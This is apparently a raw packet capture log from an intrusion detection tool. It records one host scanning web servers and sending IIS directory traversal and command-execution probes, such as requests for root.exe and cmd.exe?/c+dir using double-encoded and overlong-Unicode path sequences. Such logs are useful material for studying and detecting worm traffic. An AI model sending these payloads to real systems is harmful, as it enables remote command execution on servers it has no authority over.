No run mode specified, defaulting to verbose mode
09/19-15:26:54.316623 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2553 -> 137.189.98.192:80 TCP TTL:125 TOS:0x0 ID:20197 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D3B1F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:02.395131 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1618 -> 137.189.97.211:80 TCP TTL:125 TOS:0x0 ID:43014 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D5A5B  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:03.925387 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:1870 -> 137.189.99.59:80 TCP TTL:125 TOS:0x0 ID:12809 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D603F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.673750 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4419 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:35364 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7ADB  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.675389 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4419 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:35620 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7ADC  Ack: 0x3FA828BF  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.675411 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7E
137.189.161.199:4419 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:35876 IpLen:20 DgmLen:112 DF
***AP*** Seq: 0x372D7ADC  Ack: 0x3FA828BF  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.682272 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4419 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:36132 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B24  Ack: 0x3FA82A69  Win: 0xAA57  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.682273 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4419 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:36388 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B24  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.682765 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4420 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:36644 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B20  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.684281 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4420 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:36900 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B21  Ack: 0x3FAC5424  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.684416 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x7C
137.189.161.199:4420 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:37156 IpLen:20 DgmLen:110 DF
***AP*** Seq: 0x372D7B21  Ack: 0x3FAC5424  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 4D 53 41 44 43 2F 72 6F 6F 74 2E  GET /MSADC/root.
65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F  exe?/c+dir HTTP/
31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A  1.0..Host: www..
43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  Connnection: clo
73 65 0D 0A 0D 0A                                se....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.690790 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4420 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:37924 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B67  Ack: 0x80443587  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.690957 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4420 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:38180 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B67  Ack: 0x372D7B67  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.691455 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4421 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:38436 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7ABD  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.693684 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4421 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:38692 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7ABE  Ack: 0x3FB0087C  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.693685 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:4421 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:38948 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372D7ABE  Ack: 0x3FB0087C  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73  GET /c/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.700293 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4421 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:40740 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B0E  Ack: 0x8D4B9B39  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.700789 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4421 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:40996 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B0E  Ack: 0x372D7B0E  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.700791 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4424 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:41252 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7AD4  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.702423 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4424 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:41508 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7AD5  Ack: 0x3FB4039E  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.702609 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x86
137.189.161.199:4424 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:41764 IpLen:20 DgmLen:120 DF
***AP*** Seq: 0x372D7AD5  Ack: 0x3FB4039E  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73  GET /d/winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.709633 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4424 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:42532 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B25  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.710124 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4424 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:42788 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B25  Ack: 0x372D7B25  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.710126 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4428 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:43044 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7ACD  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.711927 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4428 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:43300 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7ACE  Ack: 0x3FB609E1  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.712273 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:4428 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:43556 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372D7ACE  Ack: 0x3FB609E1  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  255c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.718973 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4428 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:44836 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B2E  Ack: 0x8D59C195  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.718974 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4428 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:45092 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B2E  Ack: 0x372D7B2E  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.719015 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4429 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:45348 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B40  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.721797 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4429 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:46116 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B41  Ack: 0x3FB8DEC9  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.721946 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:4429 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:46372 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372D7B41  Ack: 0x3FB8DEC9  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E  GET /_vti_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.729294 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4429 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:48164 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7BB6  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.729296 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4429 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:48420 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7BB6  Ack: 0x372D7BB6  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.729302 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4434 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:48676 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B07  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.731626 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4434 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:49956 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B08  Ack: 0x3FBB73CB  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.731776 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xAB
137.189.161.199:4434 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:50212 IpLen:20 DgmLen:157 DF
***AP*** Seq: 0x372D7B08  Ack: 0x3FBB73CB  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E  GET /_mem_bin/..
25 32 35 35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E  %255c../..%255c.
2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  ./..%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31  xe?/c+dir HTTP/1
2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43  .0..Host: www..C
6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73  onnnection: clos
65 0D 0A 0D 0A                                   e....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.739123 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4434 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:50980 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B7D  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.739946 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4437 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:51236 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7AEB  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.739948 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4434 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:51492 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B7D  Ack: 0x372D7B7D  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.742551 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4437 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:52260 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7AEC  Ack: 0x3FBEFD87  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.742554 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0xC7
137.189.161.199:4437 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:52516 IpLen:20 DgmLen:185 DF
***AP*** Seq: 0x372D7AEC  Ack: 0x3FBEFD87  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 32 35  GET /msadc/..%25
35 63 2E 2E 2F 2E 2E 25 32 35 35 63 2E 2E 2F 2E  5c../..%255c../.
2E 25 32 35 35 63 2F 2E 2E 25 63 31 25 31 63 2E  .%255c/..%c1%1c.
2E 2F 2E 2E 25 63 31 25 31 63 2E 2E 2F 2E 2E 25  ./..%c1%1c../..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.750431 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4437 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:54564 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7B7D  Ack: 0x372D7B7D  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.750433 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4442 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:54820 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7B43  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.752765 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4442 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:56356 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372D7B44  Ack: 0x3FC3E2F6  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.752961 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:4442 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:56868 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372D7B44  Ack: 0x3FC3E2F6  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.753870 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4437 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:54308 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7B7D  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.760734 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4442 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:57636 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372D7BA5  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.760878 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4442 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:58404 IpLen:20 DgmLen:40
*****R** Seq: 0x372D7BA5  Ack: 0x372D7BA5  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.760880 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:4447 -> 137.189.96.51:80 TCP TTL:125 TOS:0x0 ID:58660 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372D7AE4  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:27:10.762555 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
